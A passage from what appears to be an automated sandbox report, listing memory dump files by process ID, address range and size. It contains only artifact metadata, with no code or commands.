memory/4708-291-0x00000175DEC00000-0x00000175DEC000F8-memory.dmpFilesize
248B
-
memory/4728-275-0x0000000002FB0000-0x0000000002FB2000-memory.dmpFilesize
8KB
-
memory/4728-274-0x00007FFB82860000-0x00007FFB83200000-memory.dmpFilesize
9.6MB
-
memory/4748-93-0x0000000000E50000-0x0000000000F6A000-memory.dmpFilesize
1.1MB
-
memory/4748-94-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4748-90-0x0000000000E50000-0x0000000000E51000-memory.dmpFilesize
4KB
-
memory/4748-87-0x0000000000000000-mapping.dmp
-
memory/4760-124-0x0000000000000000-mapping.dmp
-
memory/4760-143-0x0000000002C80000-0x0000000002C93000-memory.dmpFilesize
76KB
-
memory/4760-137-0x0000000003110000-0x0000000003111000-memory.dmpFilesize
4KB
-
memory/4760-144-0x0000000000400000-0x0000000000415000-memory.dmpFilesize
84KB
-
memory/4792-130-0x0000000002220000-0x0000000002221000-memory.dmpFilesize
4KB
-
memory/4792-127-0x0000000000000000-mapping.dmp
-
memory/4824-166-0x0000000000000000-mapping.dmp
-
memory/4828-91-0x0000000000000000-mapping.dmp
-
memory/4868-95-0x0000000000000000-mapping.dmp
-
memory/4868-100-0x0000000000E70000-0x0000000000E71000-memory.dmpFilesize
4KB
-
memory/4892-97-0x0000000000000000-mapping.dmp
-
memory/5012-103-0x0000000000000000-mapping.dmp
-
memory/5028-263-0x000000001B060000-0x000000001B062000-memory.dmpFilesize
8KB
-
memory/5028-261-0x0000000000220000-0x0000000000221000-memory.dmpFilesize
4KB
-
memory/5028-260-0x00007FFB7E860000-0x00007FFB7F24C000-memory.dmpFilesize
9.9MB
-
memory/5076-148-0x0000000000000000-mapping.dmp
-
memory/5080-108-0x0000000000000000-mapping.dmp
-
memory/5152-154-0x0000000000000000-mapping.dmp
-
memory/5184-155-0x0000000000000000-mapping.dmp
-
memory/5236-281-0x0000000000980000-0x0000000000986000-memory.dmpFilesize
24KB
-
memory/5236-280-0x0000000004840000-0x0000000004A4F000-memory.dmpFilesize
2.1MB
-
memory/5236-169-0x0000000000869A6B-mapping.dmp
-
memory/5236-168-0x0000000000860000-0x0000000000875000-memory.dmpFilesize
84KB
-
memory/5256-170-0x0000000000000000-mapping.dmp
-
memory/5300-173-0x0000000000000000-mapping.dmp
-
memory/5308-193-0x00000000044F0000-0x00000000044F1000-memory.dmpFilesize
4KB
-
memory/5308-191-0x00000000044F0000-0x00000000044F1000-memory.dmpFilesize
4KB
-
memory/5312-174-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/5312-176-0x0000000000402A38-mapping.dmp
-
memory/5328-175-0x0000000000000000-mapping.dmp
-
memory/5404-177-0x0000000000000000-mapping.dmp
-
memory/5428-248-0x0000000004B50000-0x0000000004B51000-memory.dmpFilesize
4KB
-
memory/5436-198-0x0000000000401000-0x000000000040B000-memory.dmpFilesize
40KB
-
memory/5436-192-0x0000000000000000-mapping.dmp
-
memory/5452-245-0x0000000004F30000-0x0000000004F31000-memory.dmpFilesize
4KB
-
memory/5460-266-0x0000000003800000-0x0000000003801000-memory.dmpFilesize
4KB
-
memory/5476-156-0x0000000000000000-mapping.dmp
-
memory/5488-202-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/5488-197-0x0000000000000000-mapping.dmp
-
memory/5504-276-0x00007FFBA07C0000-0x00007FFBA07C1000-memory.dmpFilesize
4KB
-
memory/5552-178-0x0000000000000000-mapping.dmp
-
memory/5556-157-0x0000000000000000-mapping.dmp
-
memory/5584-251-0x00000000040F0000-0x00000000040F1000-memory.dmpFilesize
4KB
-
memory/5592-199-0x0000000004CC0000-0x0000000004CC1000-memory.dmpFilesize
4KB
-
memory/5656-159-0x0000000000000000-mapping.dmp
-
memory/5704-204-0x0000000004640000-0x0000000004641000-memory.dmpFilesize
4KB
-
memory/5740-224-0x0000000000030000-0x000000000003A000-memory.dmpFilesize
40KB
-
memory/5740-217-0x00000000030C0000-0x00000000030C1000-memory.dmpFilesize
4KB
-
memory/5740-225-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/5760-208-0x0000000002BB0000-0x0000000002BB2000-memory.dmpFilesize
8KB
-
memory/5760-207-0x00007FFB82860000-0x00007FFB83200000-memory.dmpFilesize
9.6MB
-
memory/5808-160-0x0000000000000000-mapping.dmp
-
memory/5816-209-0x0000000004260000-0x0000000004261000-memory.dmpFilesize
4KB
-
memory/5852-290-0x000002BA64850000-0x000002BA648500F8-memory.dmpFilesize
248B
-
memory/5856-186-0x0000000002520000-0x0000000002522000-memory.dmpFilesize
8KB
-
memory/5856-184-0x0000000000000000-mapping.dmp
-
memory/5856-242-0x0000000002524000-0x0000000002525000-memory.dmpFilesize
4KB
-
memory/5856-185-0x00007FFB82860000-0x00007FFB83200000-memory.dmpFilesize
9.6MB
-
memory/5876-272-0x00007FFB82860000-0x00007FFB83200000-memory.dmpFilesize
9.6MB
-
memory/5876-273-0x0000000003380000-0x0000000003382000-memory.dmpFilesize
8KB
-
memory/5944-214-0x00000000045A0000-0x00000000045A1000-memory.dmpFilesize
4KB
-
memory/5944-218-0x00000000049A0000-0x00000000049A1000-memory.dmpFilesize
4KB
-
memory/5980-180-0x0000000000400000-0x0000000000415000-memory.dmpFilesize
84KB
-
memory/5980-167-0x00000000030D0000-0x00000000030D1000-memory.dmpFilesize
4KB
-
memory/6004-171-0x0000000003020000-0x0000000003021000-memory.dmpFilesize
4KB
-
memory/6004-162-0x0000000000000000-mapping.dmp
-
memory/6004-182-0x0000000000030000-0x000000000003D000-memory.dmpFilesize
52KB
-
memory/6032-163-0x0000000000000000-mapping.dmp
-
memory/6052-286-0x0000000003010000-0x0000000003101000-memory.dmpFilesize
964KB
-
memory/6076-221-0x00000000047A0000-0x00000000047A1000-memory.dmpFilesize
4KB